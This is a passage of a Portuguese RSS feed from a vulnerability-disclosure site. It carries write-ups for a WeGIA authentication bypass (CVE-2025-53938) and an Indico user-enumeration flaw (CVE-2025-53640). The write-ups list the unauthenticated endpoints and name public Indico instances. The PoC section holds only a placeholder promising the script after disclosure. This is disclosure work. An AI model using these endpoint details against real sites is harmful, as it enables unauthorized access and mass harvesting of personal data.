  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-j3qv-v3m7-73pj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53938</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53938/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53938/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53938-bypass-de-autenticação-devido-à-ausência-de-validação-de-sessão-em-múltiplos-endpoints&amp;#34;&amp;gt;CVE-2025-53938: Bypass de Autenticação devido à Ausência de Validação de Sessão em Múltiplos Endpoints
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de &amp;lt;b&amp;gt;Bypass de Autenticação&amp;lt;/b&amp;gt; foi identificado no endpoint &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt; da aplicação WeGia. Esta vulnerabilidade permite que &amp;lt;b&amp;gt;usuários não autenticados&amp;lt;/b&amp;gt; acessem funcionalidades protegidas do aplicativo e recuperem informações confidenciais enviando solicitações HTTP criadas &amp;lt;b&amp;gt;sem cookies de sessão ou tokens de autenticação&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;endpoints-vulneráveis&amp;#34;&amp;gt;Endpoints Vulneráveis:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_modulos_visiveis.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/adicionar_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53938-bypass-de-autenticação-devido-à-ausência-de-validação-de-sessão-em-múltiplos-endpoints&amp;#34;&amp;gt;CVE-2025-53938: Bypass de Autenticação devido à Ausência de Validação de Sessão em Múltiplos Endpoints
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53938&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de &amp;lt;b&amp;gt;Bypass de Autenticação&amp;lt;/b&amp;gt; foi identificado no endpoint &amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt; da aplicação WeGia. Esta vulnerabilidade permite que &amp;lt;b&amp;gt;usuários não autenticados&amp;lt;/b&amp;gt; acessem funcionalidades protegidas do aplicativo e recuperem informações confidenciais enviando solicitações HTTP criadas &amp;lt;b&amp;gt;sem cookies de sessão ou tokens de autenticação&amp;lt;/b&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;endpoints-vulneráveis&amp;#34;&amp;gt;Endpoints Vulneráveis:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_recursos_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_cargo.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/verificar_modulos_visiveis.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/exibir_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;code&amp;gt;/dao/adicionar_documento.php&amp;lt;/code&amp;gt;&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;autenticação-necessária&amp;#34;&amp;gt;Autenticação Necessária:
&amp;lt;/h3&amp;gt;&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;❌ Não&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53938/image.png&amp;#34;
	width=&amp;#34;1058&amp;#34;
	height=&amp;#34;749&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53938/image_hu_e3306e3cf65cbbc2.png 480w, /p/cve-2025-53938/image_hu_50392cb7cd1239e4.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;141&amp;#34;
		data-flex-basis=&amp;#34;339px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A falta de validação de sessão neste endpoint pode levar a vários riscos de segurança:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Exposição de Dados Não Autorizada:&amp;lt;/b&amp;gt; Usuários não autenticados podem enumerar ou recuperar dados internos confidenciais.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Escalonamento de Privilégios:&amp;lt;/b&amp;gt; Invasores podem acessar ou inferir informações destinadas apenas a usuários autorizados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Divulgação de Informações:&amp;lt;/b&amp;gt; Lógica de negócios e IDs internos (como funções ou permissões de usuário) podem ser vazados.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Suporte de Reconhecimento:&amp;lt;/b&amp;gt; Facilita o mapeamento de estruturas de backend para ataques mais direcionados.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-6p76-7mm4-j5rj&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 16 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-53640</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-53640/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-53640/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-53640-enumeração-de-usuários-via-endpoint-de-api&amp;#34;&amp;gt;CVE-2025-53640: Enumeração de usuários via endpoint de API
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) no Indico permite a enumeração de usuários autenticados por meio do Endpoint&amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt;, expondo nomes, e-mails e afiliações. Inclui script de exploração, análise de requisições e capturas de tela. Afeta instâncias do Indico implantadas globalmente (Organização Europeia para Pesquisa Nuclear (CERN), Nações Unidas (ONU), Instituto de Tecnologia de Massachusetts (MIT), Agência Espacial Europeia (ESA), entre outras).&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-53640-enumeração-de-usuários-via-endpoint-de-api&amp;#34;&amp;gt;CVE-2025-53640: Enumeração de usuários via endpoint de API
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-53640&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) no Indico permite a enumeração de usuários autenticados por meio do Endpoint&amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt;, expondo nomes, e-mails e afiliações. Inclui script de exploração, análise de requisições e capturas de tela. Afeta instâncias do Indico implantadas globalmente (Organização Europeia para Pesquisa Nuclear (CERN), Nações Unidas (ONU), Instituto de Tecnologia de Massachusetts (MIT), Agência Espacial Europeia (ESA), entre outras).&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) no aplicativo de código aberto Indico permite a enumeração em massa de usuários por meio do endpoint &amp;lt;code&amp;gt;/api/principals&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;Originalmente projetado para resolver IDs de usuários em campos específicos de formulário, este endpoint pode ser usado indevidamente para recuperar detalhes pessoais de &amp;lt;b&amp;gt;qualquer ID de usuário válido:&amp;lt;/b&amp;gt;&amp;lt;br /&amp;gt;
&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Nome completo&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Endereço de e-mail&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Cargo&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Afiliação&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;URL do Avatar&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;requisitos-de-exploração&amp;#34;&amp;gt;Requisitos de Exploração
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Um ID de usuário válido É necessária uma sessão autenticada.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;No entanto, a maioria das instâncias públicas do Indico permite o autorregistro sem verificação de e-mail, CAPTCHA ou aprovação manual.&amp;lt;/li&amp;gt;
  &amp;lt;li&amp;gt;Isso torna a vulnerabilidade &amp;lt;b&amp;gt;praticamente explorável por usuários não autenticados&amp;lt;/b&amp;gt; após a criação de uma conta simples.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;exploit&amp;#34;&amp;gt;Exploit
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-python&amp;#34; data-lang=&amp;#34;python&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;Script&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;a&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;ser&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;publicado&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;após&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;o&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;cronograma&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;de&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;divulgação&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;n&amp;#34;&amp;gt;responsável&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;.&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53640/image.png&amp;#34;
	width=&amp;#34;598&amp;#34;
	height=&amp;#34;396&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53640/image_hu_6c6de36b9674a4e6.png 480w, /p/cve-2025-53640/image_hu_cfef9b4e7402de52.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;151&amp;#34;
		data-flex-basis=&amp;#34;362px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-53640/image-1.png&amp;#34;
	width=&amp;#34;601&amp;#34;
	height=&amp;#34;725&amp;#34;
	srcset=&amp;#34;/p/cve-2025-53640/image-1_hu_af3a0c7700a339e3.png 480w, /p/cve-2025-53640/image-1_hu_80b649f3bc1e6dce.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;82&amp;#34;
		data-flex-basis=&amp;#34;198px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto-global&amp;#34;&amp;gt;Impacto Global
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O Indico é uma plataforma de gerenciamento de eventos e conferências amplamente adotada, desenvolvida pelo CERN (Organização Europeia para Pesquisa Nuclear), que impulsiona a infraestrutura acadêmica e institucional globalmente:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;CERN (Organização Europeia para Pesquisa Nuclear):&amp;lt;/b&amp;gt; Mais de 900.000 eventos anualmente; Mais de 200 salas reservadas diariamente.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;Mundial:&amp;lt;/b&amp;gt; Cerca de 145.000 eventos/ano em mais de 300 instituições.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;ONU (Organização das Nações Unidas):&amp;lt;/b&amp;gt; Mais de 180.000 participantes/ano.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;UNOG (Escritório das Nações Unidas em Genebra):&amp;lt;/b&amp;gt; Até 700.000 usuários/ano.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Amplamente utilizado por universidades, laboratórios, institutos de pesquisa e agências governamentais.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Exemplos de instâncias públicas afetadas:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://indico.cern.ch/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://indico.cern.ch/&amp;lt;a&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://indico.esa.int/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://indico.esa.int/&amp;lt;a&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://indico.mit.edu/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;https://indico.mit.edu/&amp;lt;a&amp;gt;&amp;lt;/b&amp;gt;&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Devido à sua ampla adoção em ambientes &amp;lt;b&amp;gt;científicos, acadêmicos e governamentais&amp;lt;/b&amp;gt;, esta vulnerabilidade apresenta sérios riscos:
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Vazamento de identidade de pesquisadores, funcionários e administradores.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Violações de privacidade em larga escala e exposição de diretórios institucionais.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Reconhecimento direcionado para phishing ou engenharia social.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Possível comprometimento de pesquisas e iniciativas políticas sensíveis.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Divulgação de dados pessoais (PII)&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Enumeração de usuários com privilégios altos (administradores, organizadores)&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Suporta operações de phishing em massa e spear-phishing&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Viola regulamentações como &amp;lt;b&amp;gt;GDPR, LGPD&amp;lt;/b&amp;gt; e políticas institucionais internas&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Pode constituir uma violação passível de notificação, dependendo da jurisdição&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referências&amp;#34;&amp;gt;Referências
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Indico/CVE-2025-53640.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/indico/indico/security/advisories/GHSA-q28v-664f-q6wj&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaborador&amp;#34;&amp;gt;Colaborador
